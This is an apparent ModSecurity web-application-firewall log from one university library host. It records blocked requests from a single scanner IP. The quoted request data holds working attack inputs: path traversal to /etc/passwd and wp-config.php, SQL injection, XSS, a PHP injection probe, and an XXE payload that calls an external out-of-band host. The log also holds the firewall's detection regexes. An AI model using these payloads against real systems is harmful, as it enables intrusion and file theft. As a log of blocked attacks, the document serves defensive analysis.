[Tue Aug 29 11:41:04.373150 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfeb.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAcoNOsAAAAF"]
[Tue Aug 29 11:41:04.443258 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAcqJHkAAAAG"]
[Tue Aug 29 11:41:05.410685 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAYf-NIAAAAD"]
[Tue Aug 29 11:41:05.447886 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfeb.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcoNPUAAAAF"]
[Tue Aug 29 11:41:05.475840 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAYMWVQAAAAR"]
[Tue Aug 29 11:41:05.499170 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcYU9kAAAAp"]
[Tue Aug 29 11:41:08.300835 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAczXckAAAAL"]
[Tue Aug 29 11:41:09.260339 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAcYVAIAAAAp"]
[Tue Aug 29 11:41:09.666697 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAcoNSQAAAAF"]
[Tue Aug 29 11:41:10.379945 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAActbH0AAAAH"]
[Tue Aug 29 11:41:10.487152 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAaZ9ncAAAAo"]
[Tue Aug 29 11:41:13.420148 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAYf-PUAAAAD"]
[Tue Aug 29 11:41:15.480834 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAcyp2UAAAAK"]
[Tue Aug 29 11:41:18.597320 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAc4El8AAAAP"]
[Tue Aug 29 11:41:18.711054 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAcyp3UAAAAK"]
[Tue Aug 29 11:41:19.441119 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAcyp3gAAAAK"]
[Tue Aug 29 11:41:19.488638 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAc2dQsAAAAN"]
[Tue Aug 29 11:41:19.933420 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAc0Nc4AAAAM"]
[Tue Aug 29 11:41:20.536799 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAcyp4QAAAAK"]
[Tue Aug 29 11:41:20.665455 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcyp4YAAAAK"]
[Tue Aug 29 11:41:20.705617 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAaZ9rMAAAAo"]
[Tue Aug 29 11:41:21.406877 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128cCo-f0AAAaZ9roAAAAo"]
[Tue Aug 29 11:41:21.650796 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gte5mg7qqpf5ia.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NesAAAAM"]
[Tue Aug 29 11:41:22.538920 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAAUKhFAAAABC"]
[Tue Aug 29 11:41:23.431359 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAYf-RUAAAAD"]
[Tue Aug 29 11:41:24.364553 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAc4En8AAAAP"]
[Tue Aug 29 11:41:24.395382 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAUKhFgAAABC"]
[Tue Aug 29 11:41:24.481716 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129MCo-f0AAActbMkAAAAH"]
[Tue Aug 29 11:41:25.480886 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAcbSFwAAAAv"]
[Tue Aug 29 11:41:25.555273 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAYf-SkAAAAD"]
[Tue Aug 29 11:41:26.358137 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAaZ9tYAAAAo"]
[Tue Aug 29 11:41:26.507267 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAaZ9tkAAAAo"]
